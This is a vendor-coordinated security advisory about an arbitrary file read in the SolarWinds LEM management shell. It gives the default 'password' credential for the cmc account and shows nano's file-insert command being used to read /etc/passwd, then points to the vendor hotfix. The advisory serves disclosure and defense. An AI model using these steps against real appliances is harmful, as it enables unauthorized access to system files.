Solarwinds LEM Management Shell Arbitrary File Read

Vulnerability Description

The management shell allows the end user to edit the MOTD banner displayed during SSH logon. The editor provided for this is nano. This editor has a keyboard mapped function which lets the user import a file from the local file system into the editor. An attacker can abuse this to read arbitrary files within the allowed permissions.

Technical Description

Should an attacker gain access to the SSH console for the cmc user, read access to files on the local filesystem can be achieved. The default password for the cmc user is “password”.

This is accomplished by abusing the editor selection for the MOTD banner edit functionality.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6
  //////////////////////////////////////////////////
  ///       SolarWinds Log & Event Manager       ///
  ///                   management console       ///
  //////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
    upgrade      Upgrade this Appliance
    admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
    import       Import a file that can be used from the Admin UI
    help         display this help
    exit         Exit
cmc > appliance
Available commands:
    activate           Activate appliance features after licensing.
    checklogs          Check Appliance Logs for Remote Data
    clearsyslog        Clear Syslog Logs
    cleantemp          * Clean Up Temporary Files
    multimanagerconfig * Enable/disable multimanager
    dateconfig         Update Date and Time
    dbdiskconfig       * Configure database retention
    diskusage          Check Disk Usage of your Manager
    diskusageconfig    Set Disk Usage Limit of your Manager
    editbanner         Edit the SSH login banner.
    exportsyslog       Export System Logs
    hostname           Change the Manager Appliance hostname
    import             Import SIM/LEM Backup to LEM
    limitsyslog        Configure the syslog rotation limit (default: 50)
    setlogrotate       Configure the syslog rotation frequency (hourly or daily)
    netconfig          Configure Network Parameters (IP Address, Netmask, DNS)
    ntpconfig          Update NTP Server Preferences
    password           Change the CMC User Password
    ping               Ping an IP address or hostname
    reboot             Reboot the Manager Appliance
    resetsystemmac     Reset the MAC address of the Appliance
    shutdown           Shut Down the Manager Appliance
    top                View Manager Appliance CPU/Memory Utilization
    tzconfig           Update Time Zone information
    viewnetconfig      View Network Parameters (IP address, netmask, DNS)
    exit               Return to main menu

    NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::appliance > editbanner
Press <enter> to configure the SSH banner.

Once inside nano, ^R to get the screen below:

File to insert [from ./] : /etc/passwd
^G Get Help
^C Cancel

The result will be:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:102:102::/var/spool/exim4:/bin/false
trigeo:x:1000:1000:trigeo,,,:/usr/local/contego/:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:101:104:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash
cmc:x:1001:1000:CMC,,,:/usr/local/contego/:/usr/local/contego/scripts/mgrconfig.pl
libuuid:x:105:107::/var/lib/libuuid:/bin/sh
snort:x:103:105:Snort IDS:/var/log/snort:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
lynx:x:1002:1003::/home/lynx:/bin/sh

Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

https://thwack.solarwinds.com/thread/111223

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt